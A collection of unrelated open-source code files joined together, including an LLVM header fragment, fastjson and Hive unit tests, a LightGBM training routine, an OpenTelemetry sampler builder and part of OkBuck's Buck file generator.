return findPrevDebugLoc(MBBI.getInstrIterator());
}
/// Find and return the merged DebugLoc of the branch instructions of the
/// block. Return UnknownLoc if there is none.
DebugLoc findBranchDebugLoc();
/// Possible outcome of a register liveness query to computeRegisterLiveness()
enum LivenessQueryResult {
LQR_Live, ///< Register is known to be (at least partially) live.
LQR_Dead, ///< Register is known to be fully dead.
LQR_Unknown ///< Register liveness not decidable from local neighborhood.
};
/// Return whether (physical) register \p Reg has been defined and not
/// killed as of just before \p Before.
///
/// Search is localised to a neighborhood of \p Neighborhood instructions
/// before (searching for defs or kills) and \p Neighborhood instructions
/// after (searching just for defs) \p Before.
///
/// \p Reg must be a physical register.
LivenessQueryResult computeRegisterLiveness(const TargetRegisterInfo *TRI,
unsigned Reg,
const_iterator Before,
unsigned Neighborhood = 10) const;
// Debugging methods.
void dump() const;
void print(raw_ostream &OS, const SlotIndexes * = nullptr,
bool IsStandalone = true) const;
void print(raw_ostream &OS, ModuleSlotTracker &MST,
const SlotIndexes * = nullptr, bool IsStandalone = true) const;
// Printing method used by LoopInfo.
void printAsOperand(raw_ostream &OS, bool PrintType = true) const;
/// MachineBasicBlocks are uniquely numbered at the function level, unless
/// they're not in a MachineFunction yet, in which case this will return -1.
int getNumber() const { return Number; }
void setNumber(int N) { Number = N; }
/// Return the MCSymbol for this basic block.
MCSymbol *getSymbol() const;
Optional<uint64_t> getIrrLoopHeaderWeight() const {
return IrrLoopHeaderWeight;
}
void setIrrLoopHeaderWeight(uint64_t Weight) {
IrrLoopHeaderWeight = Weight;
}
private:
/// Return probability iterator corresponding to the I successor iterator.
probability_iterator getProbabilityIterator(succ_iterator I);
const_probability_iterator
getProbabilityIterator(const_succ_iterator I) const;
friend class MachineBranchProbabilityInfo;
friend class MIPrinter;
/// Return probability of the edge from this block to MBB. This method should
/// NOT be called directly, but by using getEdgeProbability method from
/// MachineBranchProbabilityInfo class.
BranchProbability getSuccProbability(const_succ_iterator Succ) const;
// Methods used to maintain doubly linked list of blocks...
friend struct ilist_callback_traits<MachineBasicBlock>;
// Machine-CFG mutators
/// Add Pred as a predecessor of this MachineBasicBlock. Don't do this
/// unless you know what you're doing, because it doesn't update Pred's
/// successors list. Use Pred->addSuccessor instead.
void addPredecessor(MachineBasicBlock *Pred);
/// Remove Pred as a predecessor of this MachineBasicBlock. Don't do this
/// unless you know what you're doing, because it doesn't update Pred's
/// successors list. Use Pred->removeSuccessor instead.
void removePredecessor(MachineBasicBlock *Pred);
};
raw_ostream& operator<<(raw_ostream &OS, const MachineBasicBlock &MBB);
/// Prints a machine basic block reference.
///
/// The format is:
/// %bb.5 - a machine basic block with MBB.getNumber() == 5.
///
/// Usage: OS << printMBBReference(MBB) << '\n';
Printable printMBBReference(const MachineBasicBlock &MBB);
// This is useful when building IndexedMaps keyed on basic block pointers.
struct MBB2NumberFunctor {
using argument_type = const MachineBasicBlock *;
unsigned operator()(const MachineBasicBlock *MBB) const {
return MBB->getNumber();
}
};
//===--------------------------------------------------------------------===//
// GraphTraits specializations for machine basic block graphs (machine-CFGs)
//===--------------------------------------------------------------------===//
// Provide specializations of GraphTraits to be able to treat a
// MachineFunction as a graph of MachineBasicBlocks.
//
template <> struct GraphTraits<MachineBasicBlock *> {
using NodeRef = MachineBasicBlock *;
using ChildIteratorType = MachineBasicBlock::succ_iterator;
static NodeRef getEntryNode(MachineBasicBlock *BB) { return BB; }
static ChildIteratorType child_begin(NodeRef N) { return N->succ_begin(); }
static ChildIteratorType child_end(NodeRef N) { return N->succ_end(); }
};
template <> struct GraphTraits<const MachineBasicBlock *> {
using NodeRef = const MachineBasicBlock *;
using ChildIteratorType = MachineBasicBlock::const_succ_iterator;
static NodeRef getEntryNode(const MachineBasicBlock *BB) { return BB; }
static ChildIteratorType child_begin(NodeRef N) { return N->succ_begin(); }
static ChildIteratorType child_end(NodeRef N) { return N->succ_end(); }
};
// Provide specializations of GraphTraits to be able to treat a
// MachineFunction as a graph of MachineBasicBlocks and to walk it
// in inverse order. Inverse order for a function is considered
// to be when traversing the predecessor edges of a MBB
// instead of the successor edges.
//
template <> struct GraphTraits<Inverse<MachineBasicBlock*>> {
using NodeRef = MachineBasicBlock *;
using ChildIteratorType = MachineBasicBlock::pred_iterator;
static NodeRef getEntryNode(Inverse<MachineBasicBlock *> G) {
return G.Graph;
}
static ChildIteratorType child_begin(NodeRef N) { return N->pred_begin(); }
static ChildIteratorType child_end(NodeRef N) { return N->pred_end(); }
};
template <> struct GraphTraits<Inverse<const MachineBasicBlock*>> {
using NodeRef = const MachineBasicBlock *;
using ChildIteratorType = MachineBasicBlock::const_pred_iterator;
static NodeRef getEntryNode(Inverse<const MachineBasicBlock *> G) {
return G.Graph;
}
static ChildIteratorType child_begin(NodeRef N) { return N->pred_begin(); }
static ChildIteratorType child_end(NodeRef N) { return N->pred_end(); }
};
/// MachineInstrSpan provides an interface to get an iteration range
/// containing the instruction it was initialized with, along with all
/// those instructions inserted prior to or following that instruction
/// at some point after the MachineInstrSpan is constructed.
class MachineInstrSpan {
MachineBasicBlock &MBB;
MachineBasicBlock::iterator I, B, E;
public:
MachineInstrSpan(MachineBasicBlock::iterator I)
: MBB(*I->getParent()),
I(I),
B(I == MBB.begin() ? MBB.end() : std::prev(I)),
E(std::next(I)) {}
MachineBasicBlock::iterator begin() {
return B == MBB.end() ? MBB.begin() : std::next(B);
}
MachineBasicBlock::iterator end() { return E; }
bool empty() { return begin() == end(); }
MachineBasicBlock::iterator getInitial() { return I; }
};
/// Increment \p It until it points to a non-debug instruction or to \p End
/// and return the resulting iterator. This function should only be used
/// MachineBasicBlock::{iterator, const_iterator, instr_iterator,
/// const_instr_iterator} and the respective reverse iterators.
template<typename IterT>
inline IterT skipDebugInstructionsForward(IterT It, IterT End) {
while (It != End && It->isDebugInstr())
It++;
return It;
}
/// Decrement \p It until it points to a non-debug instruction or to \p Begin
/// and return the resulting iterator. This function should only be used
/// MachineBasicBlock::{iterator, const_iterator, instr_iterator,
/// const_instr_iterator} and the respective reverse iterators.
template<class IterT>
inline IterT skipDebugInstructionsBackward(IterT It, IterT Begin) {
while (It != Begin && It->isDebugInstr())
It--;
return It;
}
} // end namespace llvm
#endif // LLVM_CODEGEN_MACHINEBASICBLOCK_H
| 12,129 |
28,056 | <reponame>Czarek93/fastjson<filename>src/test/java/com/alibaba/json/bvt/parser/error/ParseErrorTest_21.java
package com.alibaba.json.bvt.parser.error;
import java.util.Map;
import org.junit.Assert;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import junit.framework.TestCase;
public class ParseErrorTest_21 extends TestCase {
public void test_for_error() throws Exception {
Exception error = null;
try {
JSON.parseObject("{\"value\":123}", Model.class);
} catch (JSONException ex) {
error = ex;
}
Assert.assertNotNull(error);
}
public void test_for_error_1() throws Exception {
Exception error = null;
try {
JSON.parseObject("{\"value\":{,,,\"id\",}}", Model.class);
} catch (JSONException ex) {
error = ex;
}
Assert.assertNotNull(error);
}
public void test_for_error_2() throws Exception {
Exception error = null;
try {
JSON.parseObject("{\"value\":{'child1':{\"id\":123}}}", Model.class, ParserConfig.getGlobalInstance(), 0);
} catch (JSONException ex) {
error = ex;
}
Assert.assertNotNull(error);
}
public void test_for_error_3() throws Exception {
Exception error = null;
try {
JSON.parseObject("{\"value\":{'child1',{\"id\":123}}}", Model.class);
} catch (JSONException ex) {
error = ex;
}
Assert.assertNotNull(error);
}
public void test_for_error_4() throws Exception {
Exception error = null;
try {
JSON.parseObject("{\"value\":{child1:{\"id\":123}}}", Model.class, ParserConfig.getGlobalInstance(), 0);
} catch (JSONException ex) {
error = ex;
}
Assert.assertNotNull(error);
}
public void test_for_error_5() throws Exception {
Exception error = null;
try {
JSON.parseObject("{\"value\":{child1,{\"id\":123}}}", Model.class, ParserConfig.getGlobalInstance(), 0, Feature.AllowUnQuotedFieldNames);
} catch (JSONException ex) {
error = ex;
}
Assert.assertNotNull(error);
}
public static class Model {
public Map<String, Child> value;
}
public static class Child {
public int id;
}
}
| 1,134 |
3,083 | /*
Copyright 2014 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package com.google.security.zynamics.binnavi.API.disassembly;
import java.util.List;
import com.google.security.zynamics.binnavi.API.disassembly.GroupNode;
import com.google.security.zynamics.binnavi.API.disassembly.IGroupNodeListener;
import com.google.security.zynamics.binnavi.API.disassembly.ViewNode;
import com.google.security.zynamics.binnavi.Gui.GraphWindows.CommentDialogs.Interfaces.IComment;
public final class MockGroupNodeListener implements IGroupNodeListener {
public String events = "";
@Override
public void addedNode(final GroupNode groupNode, final ViewNode node) {
events += "addedElement;";
}
@Override
public void appendedComment(final GroupNode groupNode, final IComment comment) {
events += "appendedComment;";
}
@Override
public void changedState(final GroupNode groupNode, final boolean collapsed) {
events += "changedState;";
}
@Override
public void deletedComment(final GroupNode groupNode, final IComment comment) {
events += "deletedComment;";
}
@Override
public void editedComment(final GroupNode groupNode, final IComment comment) {
events += "editedComment;";
}
@Override
public void initializedComment(final GroupNode groupNode, final List<IComment> comment) {
events += "initializedComment;";
}
@Override
public void removedNode(final GroupNode groupNode, final ViewNode node) {
events += "removedElement;";
}
}
| 576 |
499 | <gh_stars>100-1000
import warnings
import lightgbm as lgb
import pandas as pd
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import KFold
warnings.filterwarnings('ignore')
import time
from autox.autox_server.util import log
from autox.autox_server.model import model_util
SAMPLE_LIMIT = model_util.SAMPLE_LIMIT
def simple_lgb(G_df_dict, G_data_info, G_hist, is_train, remain_time, loop_num = None):
"""
"""
log('[+] simple lightgbm')
time_budget = G_data_info['time_budget']
Id = G_data_info['target_id']
target = G_data_info['target_label']
main_table_name = G_data_info['target_entity']
if is_train:
start = time.time()
G_hist['simple_lgb'] = {}
# 获得used_size, 训练数据不断增加
data_size = G_df_dict['BIG'].shape[0]
half_size = data_size // 2
# todo: 优化训练数据集大小
used_size = [2 ** i * 1000 for i in range(12)]
used_size = [x for x in used_size if x < half_size]
used_size.extend([half_size, data_size])
if loop_num in range(0, 3):
try:
used_size = [used_size[loop_num]]
except:
used_size = [half_size]
elif loop_num == 3:
used_size = [half_size]
end = time.time()
remain_time -= (end - start)
log("remain_time: {} s".format(remain_time))
G_hist['simple_lgb']['simple_lgb_models'] = []
G_hist['simple_lgb']['AUCs'] = []
G_hist['simple_lgb']['used_features'] = []
G_hist['simple_lgb']['feature_importances'] = []
for rum_num in range(len(used_size)):
start = time.time()
train = G_df_dict['BIG'].sample(used_size[rum_num])
# 如果数据集超过一定的数量,采用采样的方式
if train.shape[0] >= SAMPLE_LIMIT:
train = train.sample(SAMPLE_LIMIT)
log("used size: {}".format(train.shape[0]))
not_used = Id + [target, 'istrain']
used_features = [x for x in list(train.describe().columns) if x not in not_used]
G_hist['simple_lgb']['used_features'].append(used_features)
# 保存feature imp
feature_importances = pd.DataFrame()
feature_importances['feature'] = train[used_features].columns
log("feature size: {}".format(train[used_features].shape[1]))
n_fold = 5
folds = KFold(n_splits=n_fold, shuffle=True, random_state=889)
quick = False
if quick:
lr = 0.1
Early_Stopping_Rounds = 150
N_round = 500
Verbose = 20
else:
lr = 0.006883242363721497
Early_Stopping_Rounds = 300
N_round = 2000
Verbose = 50
params = {'num_leaves': 41, # 当前base 61
'min_child_weight': 0.03454472573214212,
'feature_fraction': 0.3797454081646243,
'bagging_fraction': 0.4181193142567742,
'min_data_in_leaf': 96, # 当前base 106
'objective': 'binary',
'max_depth': -1,
'learning_rate': lr, # 快速验证
"boosting_type": "gbdt",
"bagging_seed": 11,
"metric": 'auc',
"verbosity": -1,
'reg_alpha': 0.3899927210061127,
'reg_lambda': 0.6485237330340494,
'random_state': 47,
'num_threads': 16
# 'is_unbalance':True
}
for fold_n, (train_index, valid_index) in enumerate(folds.split(train[used_features])):
if fold_n != 0:
break
# log('Training on fold {}'.format(fold_n + 1))
trn_data = lgb.Dataset(train[used_features].iloc[train_index], label=train[target].iloc[train_index],
categorical_feature="")
val_data = lgb.Dataset(train[used_features].iloc[valid_index], label=train[target].iloc[valid_index],
categorical_feature="")
clf = lgb.train(params, trn_data, num_boost_round=N_round, valid_sets=[trn_data, val_data],
verbose_eval=Verbose,
early_stopping_rounds=Early_Stopping_Rounds) # , feval=evalerror
val = clf.predict(train[used_features].iloc[valid_index])
# 对于不平衡数据,可能存在label全为一类的情况
if train[target].iloc[valid_index].nunique() == 1:
log("only one calss of label in valid data. set auc = 0")
auc_score = 0.0
else:
auc_score = roc_auc_score(train[target].iloc[valid_index], val)
log('AUC: {}'.format(auc_score))
G_hist['simple_lgb']['AUCs'].append(auc_score)
G_hist['simple_lgb']['simple_lgb_models'].append(clf)
end = time.time()
remain_time -= (end - start)
log("time consumption: {}".format(str(end - start)))
log("remain_time: {} s".format(remain_time))
log("#" * 50)
feature_importances['average'] = clf.feature_importance()
feature_importances = feature_importances.sort_values(by="average", ascending=False)
G_hist['simple_lgb']['feature_importances'].append(feature_importances)
else:
start = time.time()
Id = G_data_info['target_id']
target = G_data_info['target_label']
test = G_df_dict['BIG']
test = test.loc[test['istrain'] == False]
sub = test[Id]
used_features = G_hist['simple_lgb']['used_features'][-1]
used_model = G_hist['simple_lgb']['simple_lgb_models'][-1]
sub[target] = used_model.predict(test[used_features])
G_hist['predict']['simple_lgb'] = sub
end = time.time()
remain_time -= (end - start)
log("remain_time: {} s".format(remain_time))
return remain_time
| 3,420 |
1,189 | <reponame>gcatanese/opentelemetry-java-tmp
/*
* Copyright The OpenTelemetry Authors
* SPDX-License-Identifier: Apache-2.0
*/
package io.opentelemetry.sdk.trace.samplers;
import javax.annotation.Nullable;
/** A builder for creating ParentBased sampler instances. */
public final class ParentBasedSamplerBuilder {
private final Sampler root;
@Nullable private Sampler remoteParentSampled;
@Nullable private Sampler remoteParentNotSampled;
@Nullable private Sampler localParentSampled;
@Nullable private Sampler localParentNotSampled;
ParentBasedSamplerBuilder(Sampler root) {
this.root = root;
}
/**
* Sets the {@link Sampler} to use when there is a remote parent that was sampled. If not set,
* defaults to always sampling if the remote parent was sampled.
*
* @return this Builder
*/
public ParentBasedSamplerBuilder setRemoteParentSampled(Sampler remoteParentSampled) {
this.remoteParentSampled = remoteParentSampled;
return this;
}
/**
* Sets the {@link Sampler} to use when there is a remote parent that was not sampled. If not set,
* defaults to never sampling when the remote parent isn't sampled.
*
* @return this Builder
*/
public ParentBasedSamplerBuilder setRemoteParentNotSampled(Sampler remoteParentNotSampled) {
this.remoteParentNotSampled = remoteParentNotSampled;
return this;
}
/**
* Sets the {@link Sampler} to use when there is a local parent that was sampled. If not set,
* defaults to always sampling if the local parent was sampled.
*
* @return this Builder
*/
public ParentBasedSamplerBuilder setLocalParentSampled(Sampler localParentSampled) {
this.localParentSampled = localParentSampled;
return this;
}
/**
* Sets the {@link Sampler} to use when there is a local parent that was not sampled. If not set,
* defaults to never sampling when the local parent isn't sampled.
*
* @return this Builder
*/
public ParentBasedSamplerBuilder setLocalParentNotSampled(Sampler localParentNotSampled) {
this.localParentNotSampled = localParentNotSampled;
return this;
}
/**
* Builds the {@link ParentBasedSampler}.
*
* @return the ParentBased sampler.
*/
public Sampler build() {
return new ParentBasedSampler(
this.root,
this.remoteParentSampled,
this.remoteParentNotSampled,
this.localParentSampled,
this.localParentNotSampled);
}
}
| 778 |
322 | <gh_stars>100-1000
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
* <p/>
* http://www.apache.org/licenses/LICENSE-2.0
* <p/>
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.eagle.app.module;
import com.typesafe.config.ConfigFactory;
import org.apache.eagle.app.service.ApplicationHealthCheckService;
import org.apache.eagle.app.service.ApplicationManagementService;
import org.apache.eagle.app.service.ApplicationProviderService;
import org.apache.eagle.app.service.impl.ApplicationHealthCheckServiceImpl;
import org.apache.eagle.app.service.impl.ApplicationManagementServiceImpl;
import org.apache.eagle.app.service.impl.ApplicationProviderServiceImpl;
import org.apache.eagle.app.service.impl.ApplicationStatusUpdateServiceImpl;
import org.apache.eagle.metadata.service.ApplicationDescService;
import com.google.inject.AbstractModule;
import com.google.inject.Singleton;
import com.google.inject.util.Providers;
import org.apache.eagle.metadata.service.ApplicationStatusUpdateService;
public class ApplicationGuiceModule extends AbstractModule {
private final ApplicationProviderService appProviderInst;
public ApplicationGuiceModule(ApplicationProviderService appProviderInst) {
this.appProviderInst = appProviderInst;
}
public ApplicationGuiceModule() {
this.appProviderInst = new ApplicationProviderServiceImpl(ConfigFactory.load());
}
@Override
protected void configure() {
bind(ApplicationProviderService.class).toProvider(Providers.of(appProviderInst));
bind(ApplicationDescService.class).toProvider(Providers.of(appProviderInst));
bind(ApplicationManagementService.class).to(ApplicationManagementServiceImpl.class).in(Singleton.class);
bind(ApplicationStatusUpdateService.class).to(ApplicationStatusUpdateServiceImpl.class).in(Singleton.class);
bind(ApplicationHealthCheckService.class).to(ApplicationHealthCheckServiceImpl.class).in(Singleton.class);
}
} | 720 |
3,246 | package com.polidea.rxandroidble2.internal;
/**
* The class representing a priority with which an {@link QueueOperation} should be executed.
* Used in @Override definedPriority()
*/
public class Priority {
public static final Priority HIGH = new Priority(100);
public static final Priority NORMAL = new Priority(50);
public static final Priority LOW = new Priority(0);
final int priority;
private Priority(int priority) {
this.priority = priority;
}
}
| 142 |
515 | <gh_stars>100-1000
/*=============================================================================
Library: CTK
Copyright (c) German Cancer Research Center,
Division of Medical and Biological Informatics
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=============================================================================*/
#ifndef CTKPLUGINBROWSER_H
#define CTKPLUGINBROWSER_H
#include <QMainWindow>
#include <ui_ctkPluginBrowserMainWindow.h>
#include "ctkPluginBrowserEditors.h"
#include <ctkPluginEvent.h>
#include <ctkPluginFrameworkEvent.h>
#include <ctkPlugin.h>
#include <ctkServiceEvent.h>
class ctkPluginFramework;
class ctkPluginBrowser : public QMainWindow
{
Q_OBJECT
public:
ctkPluginBrowser(ctkPluginFramework* framework);
private Q_SLOTS:
void pluginSelected(const QModelIndex& index);
void pluginDoubleClicked(const QModelIndex& index);
void qtResourceDoubleClicked(const QModelIndex& index);
void dbResourceDoubleClicked(const QModelIndex& index);
void frameworkEvent(const ctkPluginFrameworkEvent& event);
void pluginEvent(const ctkPluginEvent& event);
void serviceEvent(const ctkServiceEvent& event);
void startPlugin();
void startPluginNow();
void stopPlugin();
private:
void closeEvent(QCloseEvent* closeEvent);
void updatePluginToolbar(QSharedPointer<ctkPlugin> plugin);
void startPlugin(ctkPlugin::StartOptions options);
QMap<ctkPluginEvent::Type, QString> pluginEventTypeToString;
ctkPluginFramework* framework;
Ui::ctkPluginBrowserWindow ui;
ctkPluginBrowserEditors* editors;
QAction* startPluginNowAction;
QAction* startPluginAction;
QAction* stopPluginAction;
};
#endif // CTKPLUGINBROWSER_H
| 629 |
631 | #ifndef _PRIVATE_ERRORS_H_
#define _PRIVATE_ERRORS_H_
#define BP_OK 0
#define BP_EFILE 0x101
#define BP_EFILEREAD_OOB 0x102
#define BP_EFILEREAD 0x103
#define BP_EFILEWRITE 0x104
#define BP_EFILEFLUSH 0x105
#define BP_EFILERENAME 0x106
#define BP_ECOMPACT_EXISTS 0x107
#define BP_ECOMP 0x201
#define BP_EDECOMP 0x202
#define BP_EALLOC 0x301
#define BP_EMUTEX 0x302
#define BP_ERWLOCK 0x303
#define BP_ENOTFOUND 0x401
#define BP_ESPLITPAGE 0x402
#define BP_EEMPTYPAGE 0x403
#define BP_EUPDATECONFLICT 0x404
#define BP_EREMOVECONFLICT 0x405
#endif /* _PRIVATE_ERRORS_H_ */
| 375 |
4,140 | <reponame>FANsZL/hive<filename>serde/src/test/org/apache/hadoop/hive/serde2/columnar/TestBytesRefArrayWritable.java
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hive.serde2.columnar;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
public class TestBytesRefArrayWritable {
private final BytesRefArrayWritable left = new BytesRefArrayWritable(4);
private final BytesRefArrayWritable right = new BytesRefArrayWritable(4);
@Before
public void setup() throws Exception {
left.set(0, new BytesRefWritable("123".getBytes("UTF-8")));
left.set(1, new BytesRefWritable("456".getBytes("UTF-8")));
left.set(2, new BytesRefWritable("789".getBytes("UTF-8")));
left.set(3, new BytesRefWritable("1000".getBytes("UTF-8")));
right.set(0, new BytesRefWritable("123".getBytes("UTF-8")));
right.set(1, new BytesRefWritable("456".getBytes("UTF-8")));
right.set(2, new BytesRefWritable("289".getBytes("UTF-8")));
right.set(3, new BytesRefWritable("1000".getBytes("UTF-8")));
}
@Test // HIVE-5839
public void testCompareTo() {
int a = left.compareTo(right);
int b = right.compareTo(left);
Assert.assertEquals("a.compareTo(b) should be equal to -b.compareTo(a)", a, -b );
Assert.assertEquals("An object must be equal to itself", 0, left.compareTo(left));
}
}
| 703 |
1,090 | package com.uber.okbuck.generator;
import com.google.common.collect.Multimap;
import com.google.common.collect.TreeMultimap;
import com.uber.okbuck.composer.android.AndroidBinaryRuleComposer;
import com.uber.okbuck.composer.android.AndroidBuckRuleComposer;
import com.uber.okbuck.composer.android.AndroidBuildConfigRuleComposer;
import com.uber.okbuck.composer.android.AndroidInstrumentationApkRuleComposer;
import com.uber.okbuck.composer.android.AndroidInstrumentationTestRuleComposer;
import com.uber.okbuck.composer.android.AndroidModuleRuleComposer;
import com.uber.okbuck.composer.android.AndroidTestRuleComposer;
import com.uber.okbuck.composer.android.ExopackageAndroidLibraryRuleComposer;
import com.uber.okbuck.composer.android.GenAidlRuleComposer;
import com.uber.okbuck.composer.android.KeystoreRuleComposer;
import com.uber.okbuck.composer.android.ManifestRuleComposer;
import com.uber.okbuck.composer.android.PreBuiltNativeLibraryRuleComposer;
import com.uber.okbuck.composer.jvm.JvmIntegrationTestRuleComposer;
import com.uber.okbuck.composer.jvm.JvmLibraryRuleComposer;
import com.uber.okbuck.composer.jvm.JvmTestRuleComposer;
import com.uber.okbuck.core.manager.BuckFileManager;
import com.uber.okbuck.core.model.android.AndroidAppInstrumentationTarget;
import com.uber.okbuck.core.model.android.AndroidAppTarget;
import com.uber.okbuck.core.model.android.AndroidLibInstrumentationTarget;
import com.uber.okbuck.core.model.android.AndroidLibTarget;
import com.uber.okbuck.core.model.base.ProjectType;
import com.uber.okbuck.core.model.base.RuleType;
import com.uber.okbuck.core.model.jvm.JvmTarget;
import com.uber.okbuck.core.util.ProjectCache;
import com.uber.okbuck.core.util.ProjectUtil;
import com.uber.okbuck.extension.OkBuckExtension;
import com.uber.okbuck.extension.TestExtension;
import com.uber.okbuck.extension.VisibilityExtension;
import com.uber.okbuck.template.android.AndroidModuleRule;
import com.uber.okbuck.template.android.AndroidRule;
import com.uber.okbuck.template.core.Rule;
import java.io.File;
import java.util.ArrayList;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.stream.Collectors;
import javax.annotation.Nullable;
import org.gradle.api.Project;
public final class BuckFileGenerator {
private BuckFileGenerator() {}
/** generate {@code BUCKFile} */
public static void generate(
Project project, BuckFileManager buckFileManager, OkBuckExtension okBuckExtension) {
VisibilityExtension visibilityExtension = okBuckExtension.getVisibilityExtension();
TestExtension testExtension = okBuckExtension.getTestExtension();
File moduleDir = project.getBuildFile().getParentFile();
File visibilityFile = new File(moduleDir, visibilityExtension.visibilityFileName);
boolean hasVisibilityFile = visibilityFile.isFile();
boolean integrationTestsEnabled = testExtension.enableIntegrationTests;
List<Rule> rules = createRules(project, integrationTestsEnabled);
Multimap<String, String> extraLoadStatements = TreeMultimap.create();
if (hasVisibilityFile) {
rules.forEach(rule -> rule.fileConfiguredVisibility(true));
extraLoadStatements.put(
":" + visibilityExtension.visibilityFileName, visibilityExtension.visibilityFunction);
}
File buckFile = project.file(okBuckExtension.buildFileName);
buckFileManager.writeToBuckFile(rules, buckFile, extraLoadStatements);
}
private static List<Rule> createRules(Project project, boolean integrationTestsEnabled) {
List<Rule> rules = new ArrayList<>();
ProjectType projectType = ProjectUtil.getType(project);
ProjectCache.getTargetCache(project)
.getTargets()
.forEach(
(name, target) -> {
switch (projectType) {
case JAVA_LIB:
case GROOVY_LIB:
case KOTLIN_LIB:
case SCALA_LIB:
rules.addAll(
createRules(
(JvmTarget) target,
projectType.getMainRuleType(),
projectType.getTestRuleType(),
projectType.getIntegrationTestRuleType(),
integrationTestsEnabled));
break;
case ANDROID_LIB:
AndroidLibTarget androidLibTarget = (AndroidLibTarget) target;
List<Rule> targetRules = createRules(androidLibTarget);
rules.addAll(targetRules);
if (androidLibTarget.getLibInstrumentationTarget() != null) {
rules.addAll(
createRules(androidLibTarget.getLibInstrumentationTarget(), targetRules));
}
break;
case ANDROID_APP:
AndroidAppTarget androidAppTarget = (AndroidAppTarget) target;
targetRules = createRules(androidAppTarget);
rules.addAll(targetRules);
if (androidAppTarget.getAppInstrumentationTarget() != null) {
rules.addAll(
createRules(
androidAppTarget.getAppInstrumentationTarget(),
androidAppTarget,
targetRules));
}
break;
default:
throw new IllegalArgumentException(
"Okbuck does not support "
+ project
+ "type projects yet. Please use the extension option okbuck.buckProjects to exclude "
+ project);
}
});
// de-dup rules by name
return new ArrayList<>(new LinkedHashSet<>(rules));
}
private static List<Rule> createRules(
JvmTarget target,
RuleType mainRuleType,
RuleType testRuleType,
RuleType integrationTestRuleType,
boolean integrationTestsEnabled) {
List<Rule> rules =
new ArrayList<>(
JvmLibraryRuleComposer.compose(target, mainRuleType, integrationTestsEnabled));
if (!target.getTest().getSources().isEmpty()) {
rules.add(JvmTestRuleComposer.compose(target, testRuleType));
}
if (integrationTestsEnabled && !target.getIntegrationTest().getSources().isEmpty()) {
rules.add(JvmIntegrationTestRuleComposer.compose(target, integrationTestRuleType));
}
return rules;
}
private static List<Rule> createRules(
AndroidLibTarget target,
@Nullable String appClass,
List<String> extraDeps,
List<String> extraResDeps) {
String manifestRuleName = ":" + AndroidBuckRuleComposer.libManifest(target);
List<Rule> androidLibRules = new ArrayList<>();
// Aidl
List<Rule> aidlRules =
target
.getAidl()
.stream()
.map(aidlDir -> GenAidlRuleComposer.compose(target, aidlDir, manifestRuleName))
.collect(Collectors.toList());
List<String> aidlRuleNames =
aidlRules.stream().map(Rule::buckName).collect(Collectors.toList());
androidLibRules.addAll(aidlRules);
// BuildConfig
if (target.shouldGenerateBuildConfig()) {
androidLibRules.add(AndroidBuildConfigRuleComposer.compose(target));
}
// Jni
androidLibRules.addAll(
target
.getJniLibs()
.stream()
.map(jniLib -> PreBuiltNativeLibraryRuleComposer.compose(target, jniLib))
.collect(Collectors.toList()));
List<String> deps = androidLibRules.stream().map(Rule::buckName).collect(Collectors.toList());
deps.addAll(extraDeps);
// Unified android lib
androidLibRules.add(
AndroidModuleRuleComposer.compose(target, deps, aidlRuleNames, appClass, extraResDeps));
// Test
if (target.getRobolectricEnabled()
&& !target.getTest().getSources().isEmpty()
&& !target.getIsTest()) {
androidLibRules.add(
AndroidTestRuleComposer.compose(target, manifestRuleName, deps, aidlRuleNames, appClass));
}
return new ArrayList<>(androidLibRules);
}
private static List<Rule> createRules(AndroidLibTarget target) {
return createRules(target, null, new ArrayList<>(), new ArrayList<>());
}
private static List<Rule> createRules(
AndroidAppTarget target, List<String> additionalDeps, List<String> additionalResDeps) {
List<String> deps = new ArrayList<>();
deps.add(":" + AndroidBuckRuleComposer.src(target));
deps.addAll(additionalDeps);
List<Rule> libRules =
createRules(
target,
target.getExopackage() != null ? target.getExopackage().getAppClass() : null,
additionalDeps,
additionalResDeps);
List<Rule> rules = new ArrayList<>(libRules);
libRules.forEach(
rule -> {
if (rule instanceof AndroidModuleRule && rule.name() != null) {
deps.add(rule.buckName().replace(":src_", ":res_"));
}
});
Rule keystoreRule = KeystoreRuleComposer.compose(target);
if (target.getExopackage() != null) {
Rule exoPackageRule = ExopackageAndroidLibraryRuleComposer.compose(target);
rules.add(exoPackageRule);
deps.add(exoPackageRule.buckName());
}
if (keystoreRule != null) {
rules.add(keystoreRule);
Rule appManifest = ManifestRuleComposer.composeForBinary(target);
rules.add(appManifest);
rules.add(
AndroidBinaryRuleComposer.compose(
target,
appManifest.buckName(),
deps,
